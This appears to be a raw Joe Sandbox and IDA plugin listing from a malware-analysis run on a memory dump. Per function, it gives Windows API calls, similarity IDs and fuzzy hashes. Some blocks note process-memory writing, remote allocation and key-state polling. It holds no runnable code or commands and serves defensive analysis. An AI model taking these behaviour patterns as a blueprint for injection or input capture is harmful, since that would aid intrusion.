                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1389676194-0
                                                                                                                                                          • Opcode ID: 4587ad3b5b07adda960aecb7d79b2f9f5788325107080af05915e58b660b848b
                                                                                                                                                          • Instruction ID: 207ccc51b85ec4a0c88a8018eb7131567fe1e160e610eeca96f3035d9147bebc
                                                                                                                                                          • Opcode Fuzzy Hash: 4587ad3b5b07adda960aecb7d79b2f9f5788325107080af05915e58b660b848b
                                                                                                                                                          • Instruction Fuzzy Hash: 2B413A35A00215EFCB01EF64D991AADBBF5FF58310B148099E80AAB362DB31ED51CB51
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32(000000FF), ref: 0013B749
                                                                                                                                                          • ScreenToClient.USER32(00000000,000000FF), ref: 0013B766
                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 0013B78B
                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 0013B799
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                          • Opcode ID: 6b2c65d5454e27a408c1fec2d1ea1cfad2606dcd08acae88de89ea62c3f116be
                                                                                                                                                          • Instruction ID: 98bd381ad692b488eb78bf90c40eaa2b6e65db3cb529b4fb2eb49ea4ab6abbee
                                                                                                                                                          • Opcode Fuzzy Hash: 6b2c65d5454e27a408c1fec2d1ea1cfad2606dcd08acae88de89ea62c3f116be
                                                                                                                                                          • Instruction Fuzzy Hash: 77415D35908619FFDF19DF64C884AEABBB4FB45364F104219F929922D0D730AA90DFA1
                                                                                                                                                          APIs
                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00183C92
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00183D71
                                                                                                                                                            • Part of subcall function 00183C63: FreeLibrary.KERNEL32(?), ref: 00183D2B
                                                                                                                                                            • Part of subcall function 00183C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00183D4E
                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00183D16
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnumFreeLibrary$Delete
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1943264518-0
                                                                                                                                                          • Opcode ID: 871e6cab7c5792cb3bc659193f361f4efdd1596b1b6b9b6b65e62caf586ca097
                                                                                                                                                          • Instruction ID: ea42c6c0a8ff3b9083f56eaebf262314e0d4979e26709f70a3e273d92b67d006
                                                                                                                                                          • Opcode Fuzzy Hash: 871e6cab7c5792cb3bc659193f361f4efdd1596b1b6b9b6b65e62caf586ca097
                                                                                                                                                          • Instruction Fuzzy Hash: A6313C71901209BFDB15ABD4DC89AFEB7BCEF09300F44016AF522A2550E7709F859F60
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0015C156
                                                                                                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 0015C200
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0015C208
                                                                                                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 0015C216
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0015C21E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                          • Opcode ID: 4482c61c9d0d11d5af529308463b7dacb814a94f8c92ee7756a71f9dd709fe87
                                                                                                                                                          • Instruction ID: d1cf09a9cce7b9c3dbb1570eed69d76b84d4ed83dbc1a7c2ba8638001e5c0981
                                                                                                                                                          • Opcode Fuzzy Hash: 4482c61c9d0d11d5af529308463b7dacb814a94f8c92ee7756a71f9dd709fe87
                                                                                                                                                          • Instruction Fuzzy Hash: F231CE71500619EFDF04CFA8DE8CA9E3BB5EB05316F114228FC35AA1D1C7B09948CB90
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0015E9CD
                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0015E9EA
                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0015EA22
                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0015EA48
                                                                                                                                                          • _wcsstr.LIBCMT ref: 0015EA52
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3902887630-0
                                                                                                                                                          • Opcode ID: c507b358f671705eb31155b6ee4d378888d2410cc6769ecb7daac988e3a26f51
                                                                                                                                                          • Instruction ID: 537fd71aea641d6027d7d8a03585547f8d5c4111e52ee9d5ae375be51f5b9037
                                                                                                                                                          • Opcode Fuzzy Hash: c507b358f671705eb31155b6ee4d378888d2410cc6769ecb7daac988e3a26f51
                                                                                                                                                          • Instruction Fuzzy Hash: 93212971604200BAEB1A9B39EC45E7BBBE8DF49750F108029FD0ACF0A1DB70DD808250
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0018DCC0
                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0018DCE4
                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0018DCFC
                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 0018DD24
                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0017407D,00000000), ref: 0018DD42
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0015CA86
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0015CAB8
                                                                                                                                                          • __itow.LIBCMT ref: 0015CAD0
                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0015CAF6
                                                                                                                                                          • __itow.LIBCMT ref: 0015CB07
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$__itow$_memmove
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(00000000), ref: 001789CE
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001789E5
                                                                                                                                                          • GetDC.USER32(00000000), ref: 00178A21
                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00178A2D
                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00178A68
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                          APIs
                                                                                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013B5EB
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0013B5FA
                                                                                                                                                          • BeginPath.GDI32(?), ref: 0013B611
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0013B63B
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                          APIs
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 00142E81
                                                                                                                                                          • CreateThread.KERNEL32(?,?,00142FB7,00000000,?,?), ref: 00142EC5
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00142ECF
                                                                                                                                                          • _free.LIBCMT ref: 00142ED8
                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00142EE3
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                          APIs
                                                                                                                                                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015B903
                                                                                                                                                          • GetLastError.KERNEL32(?,0015B3CB,?,?,?), ref: 0015B90D
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,0015B3CB,?,?,?), ref: 0015B91C
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,0015B3CB), ref: 0015B923
                                                                                                                                                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015B93A
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 883493501-0
                                                                                                                                                          APIs
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00168371
                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0016837F
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00168387
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00168391
                                                                                                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001683CD
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                          APIs
                                                                                                                                                          • CLSIDFromProgID.COMBASE ref: 0015A874
                                                                                                                                                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0015A88F
                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000), ref: 0015A89D
                                                                                                                                                          • CoTaskMemFree.COMBASE(00000000), ref: 0015A8AD
                                                                                                                                                          • CLSIDFromString.COMBASE(?,?), ref: 0015A8B9
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0015B7A5
                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0015B7AF
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0015B7BE
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0015B7C5
                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0015B7DB
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 47921759-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0015B806
                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0015B810
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0015B81F
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0015B826
                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0015B83C
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 47921759-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0015FA8F
                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0015FAA6
                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 0015FABE
                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 0015FADA
                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0015FAF4
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                          APIs
                                                                                                                                                          • EndPath.GDI32(?), ref: 0013B526
                                                                                                                                                          • StrokeAndFillPath.GDI32(?,?,0019F583,00000000,?), ref: 0013B542
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0013B555
                                                                                                                                                          • DeleteObject.GDI32 ref: 0013B568
                                                                                                                                                          • StrokePath.GDI32(?), ref: 0013B583
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2625713937-0
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0016FAB2
                                                                                                                                                          • CoCreateInstance.COMBASE(001ADA7C,00000000,00000001,001AD8EC,?), ref: 0016FACA
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0016FD2D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                          • String ID: .lnk
                                                                                                                                                          • API String ID: 2683427295-24824748
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: #$+
                                                                                                                                                          • API String ID: 0-2552117581
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,001BDC40,?,0000000F,0000000C,00000016,001BDC40,?), ref: 0016507B
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                            • Part of subcall function 0012B8A7: _memmove.LIBCMT ref: 0012B8FB
                                                                                                                                                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001650FB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                          • String ID: REMOVE$THIS
                                                                                                                                                          • API String ID: 2528338962-776492005
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00164D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0015C9FE,?,?,00000034,00000800,?,00000034), ref: 00164D6B
                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0015CFC9
                                                                                                                                                            • Part of subcall function 00164D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0015CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00164D36
                                                                                                                                                            • Part of subcall function 00164C65: GetWindowThreadProcessId.USER32(?,?), ref: 00164C90
                                                                                                                                                            • Part of subcall function 00164C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0015C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00164CA0
                                                                                                                                                            • Part of subcall function 00164C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0015C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00164CB6
                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0015D036
                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0015D083
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                          • Opcode ID: 5493d3da760ba062fb6a0d56e4f15ff3acc4748fa6b22eff7a35e6d0763bcaad
                                                                                                                                                          • Instruction ID: 30cc1a016c5760fc5db5a8a34dc13dd241b82e44a2d8d9e9fa4ad612acb9acc0
                                                                                                                                                          • Opcode Fuzzy Hash: 5493d3da760ba062fb6a0d56e4f15ff3acc4748fa6b22eff7a35e6d0763bcaad
                                                                                                                                                          • Instruction Fuzzy Hash: 34413C72900218AFDB10DFA4DC81AEEBBB8AF19700F104095FA55BB191DB706E99CB61
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001BDBF0,00000000,?,?,?,?), ref: 0018A4E6
                                                                                                                                                          • GetWindowLongW.USER32 ref: 0018A503
                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0018A513
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                          • Opcode ID: 0123db462bec0a0e16a097595986d9fe535b08d593314c5d8aca91881112e8c2
                                                                                                                                                          • Instruction ID: f3c7014ee6300ea32c1f9c6d3c23881ab9a7a29ca543d633c801785aaa341a17
                                                                                                                                                          • Opcode Fuzzy Hash: 0123db462bec0a0e16a097595986d9fe535b08d593314c5d8aca91881112e8c2
                                                                                                                                                          • Instruction Fuzzy Hash: 8B31B031200605AFEF11AF38DC45BEA7BA9EF49324F244726F975A32E1D770E9909B50
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0018A74F
                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0018A75D
                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0018A764
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                          • Opcode ID: 377dc42f7189aff45dfbc1cd643ec53b378689ab3ae0b0eaf86c8896442d4883
                                                                                                                                                          • Instruction ID: a5d0b5d7451ce9bf3aee26e93b7abcaf36df314a102e8464d31b8bf2ff812185
                                                                                                                                                          • Opcode Fuzzy Hash: 377dc42f7189aff45dfbc1cd643ec53b378689ab3ae0b0eaf86c8896442d4883
                                                                                                                                                          • Instruction Fuzzy Hash: CD21AEB5600205BFEB00EF64DCC1EAB37ADEF5A394B54001AFA019B291CB71ED51DBA1
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0018983D
                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0018984D
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00189872
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                          • String ID: Listbox
                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                          • Opcode ID: 86e1af85ef4075bbdccaf87a78dc421280633347b6087d507cd9f5d6b487812c
                                                                                                                                                          • Instruction ID: 418505322401a1ec91954af5f81ff7cf08eda324acd2d33488ea755bcbab469a
                                                                                                                                                          • Opcode Fuzzy Hash: 86e1af85ef4075bbdccaf87a78dc421280633347b6087d507cd9f5d6b487812c
                                                                                                                                                          • Instruction Fuzzy Hash: 5321D132610118BFEF129F54DC85FBB3BAAEF8A754F018124F905AB190CB71AD518FA0
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0018A27B
                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0018A290
                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0018A29D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                          • Opcode ID: 5ba495ba4a2fc75ec702fc9cd6cd07224f26d80cefed7c1553f77209e4380744
                                                                                                                                                          • Instruction ID: fe896086c429af8a2d743b367623d929832227d1af6e6acac24e4d7a8a70ac72
                                                                                                                                                          • Opcode Fuzzy Hash: 5ba495ba4a2fc75ec702fc9cd6cd07224f26d80cefed7c1553f77209e4380744
                                                                                                                                                          • Instruction Fuzzy Hash: 0E11E371200208BBEB246F65CC46FAB3BA9EF89B54F024219FA45A6190D372A851CF60
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00142F11,00000000), ref: 00142F79
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,?,?,00142F11,00000000), ref: 00142F80
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: RoInitialize$combase.dll
                                                                                                                                                          • API String ID: 1029625771-340411864
                                                                                                                                                          • Opcode ID: 679a612aaf26985c5ab0aee05308a5f62e921bf7d9322f97999f21f5a9d909a0
                                                                                                                                                          • Instruction ID: cc77791b431afe909c926d434095533774200ad9a9bd1ed10ba0a93818563bfb
                                                                                                                                                          • Opcode Fuzzy Hash: 679a612aaf26985c5ab0aee05308a5f62e921bf7d9322f97999f21f5a9d909a0
                                                                                                                                                          • Instruction Fuzzy Hash: 2DE01A74695350ABDB115FB0FC89B593764AB09706F814024F102DACB0CBF980C4DF08
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00142F4E), ref: 0014304E
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000), ref: 00143055
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: RoUninitialize$combase.dll
                                                                                                                                                          • API String ID: 1029625771-2819208100
                                                                                                                                                          • Opcode ID: e3de4b39e328af0093f58f39e09477ce1f2dd9bafaa2d59f1fa19389ca2ab114
                                                                                                                                                          • Instruction ID: 63d310366a3c4d035dc03b7369993af8efc665a66ff462a36ebbf42929d4656f
                                                                                                                                                          • Opcode Fuzzy Hash: e3de4b39e328af0093f58f39e09477ce1f2dd9bafaa2d59f1fa19389ca2ab114
                                                                                                                                                          • Instruction Fuzzy Hash: 68E0ECB4686740ABDB229FA1FD4DB493A65FB09702F110159F10ADACB0CBF4C5C0CB18
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LocalTime__swprintf
                                                                                                                                                          • String ID: %.3d$WIN_XPe
                                                                                                                                                          • API String ID: 2070861257-2409531811
                                                                                                                                                          • Opcode ID: 9324042b33b0e8d8c05d078f57b8a62f84b51d69d0ea78fe6c81a64b9c9e7617
                                                                                                                                                          • Instruction ID: 76aac97558379d7838e71526f4120253b140adcfea77407e4b4f03226a9be54c
                                                                                                                                                          • Opcode Fuzzy Hash: 9324042b33b0e8d8c05d078f57b8a62f84b51d69d0ea78fe6c81a64b9c9e7617
                                                                                                                                                          • Instruction Fuzzy Hash: DAE06271C0C12CEBCF58DA90AE86ABA73BCBB08300F5588D3F91693454D7359B94AB12
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,001820EC,?,0017F751), ref: 00182104
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,GetProcessId,?,001820EC,?,0017F751), ref: 00182116
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: GetProcessId$kernel32.dll
                                                                                                                                                          • API String ID: 1029625771-399901964
                                                                                                                                                          • Opcode ID: 6f5b89f99bae416c0e30abd00c8c4b30a3974fb2cfacee78db77b1a8c31d13d5
                                                                                                                                                          • Instruction ID: 1187515d8fdcea62a7bef822dc920a7bbc020b775d58e3834bb9414b4a07aa25
                                                                                                                                                          • Opcode Fuzzy Hash: 6f5b89f99bae416c0e30abd00c8c4b30a3974fb2cfacee78db77b1a8c31d13d5
                                                                                                                                                          • Instruction Fuzzy Hash: EBD0A934610B128FD7217FA0F80D6023BE8AB04300B20542AE69AD2A98DBB0C8C0CF60
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0013E69C,?,0013E43F), ref: 0013E6B4
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,GetNativeSystemInfo,?,0013E69C,?,0013E43F), ref: 0013E6C6
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                          • API String ID: 1029625771-192647395
